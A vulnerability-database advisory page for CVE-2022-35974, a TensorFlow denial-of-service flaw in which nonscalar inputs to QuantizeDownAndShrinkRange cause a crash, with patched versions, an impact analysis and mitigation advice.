Skip to main content

CVE-2022-35974: CWE-20: Improper Input Validation in tensorflow tensorflow

Medium
Published: Fri Sep 16 2022 (09/16/2022, 21:05:12 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

AI-Powered Analysis

AILast updated: 06/22/2025, 19:51:34 UTC

Technical Analysis

CVE-2022-35974 is a medium-severity vulnerability in TensorFlow, an open-source machine learning platform widely used across various industries for developing and deploying machine learning models. The vulnerability arises from improper input validation (CWE-20) in the function QuantizeDownAndShrinkRange. Specifically, when the inputs input_min or input_max are provided as nonscalar values instead of the expected scalar values, the function triggers a segmentation fault (segfault). This segfault can be exploited to cause a denial of service (DoS) condition, crashing the TensorFlow process and disrupting any machine learning workloads relying on it. The issue affects multiple TensorFlow versions: all versions prior to 2.7.2, versions between 2.8.0 and 2.8.1, and versions between 2.9.0 and 2.9.1. The vulnerability was patched in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613, and fixes have been backported to supported versions 2.7.2, 2.8.1, and 2.9.1, with the fix included in TensorFlow 2.10.0. No known exploits have been observed in the wild, and no workarounds exist. The root cause is the lack of proper validation of input types and shapes before processing, which leads to memory access violations and crashes. Since TensorFlow is often embedded in larger applications or services, this vulnerability can be triggered remotely if untrusted input is passed to the affected function, potentially causing service interruptions.

Potential Impact

For European organizations, the impact of this vulnerability primarily concerns availability. Organizations that rely on TensorFlow for critical machine learning workloads—such as financial institutions using AI for fraud detection, healthcare providers employing AI for diagnostics, or manufacturing firms utilizing AI for predictive maintenance—may experience service disruptions if the vulnerability is exploited. A successful denial of service attack could halt AI-driven processes, leading to operational delays, loss of productivity, and potential financial losses. While the vulnerability does not directly compromise confidentiality or integrity, the disruption of AI services could indirectly affect business continuity and decision-making processes. Given TensorFlow's widespread adoption in research institutions and enterprises across Europe, especially in technology hubs and AI-driven sectors, the risk of operational impact is non-negligible. However, the absence of known exploits in the wild and the requirement for specific malformed inputs to trigger the segfault somewhat limits the immediate threat level. Nonetheless, unpatched systems remain vulnerable to potential targeted DoS attacks.

Mitigation Recommendations

To mitigate this vulnerability, European organizations should prioritize upgrading TensorFlow installations to versions 2.7.2, 2.8.1, 2.9.1, or later (including 2.10.0) where the patch is applied. Since no workarounds exist, patching is the primary defense. Organizations should audit their machine learning pipelines to identify any components that invoke QuantizeDownAndShrinkRange or related quantization functions, especially those that process external or untrusted inputs. Implementing strict input validation at the application level before passing data to TensorFlow can reduce the risk of malformed inputs triggering the vulnerability. Additionally, deploying runtime monitoring and anomaly detection to identify unexpected crashes or segfaults in TensorFlow processes can enable rapid detection and response to potential exploitation attempts. For environments where immediate patching is not feasible, isolating TensorFlow workloads in containerized or sandboxed environments can limit the impact of a DoS condition. Finally, organizations should maintain up-to-date inventories of TensorFlow versions in use and integrate vulnerability scanning into their CI/CD pipelines to ensure timely detection of vulnerable versions.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2022-07-15T00:00:00.000Z
Cisa Enriched
true

Threat ID: 682d9845c4522896dcbf40b0

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 7:51:34 PM

Last updated: 7/27/2025, 1:08:42 AM

Views: 10

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats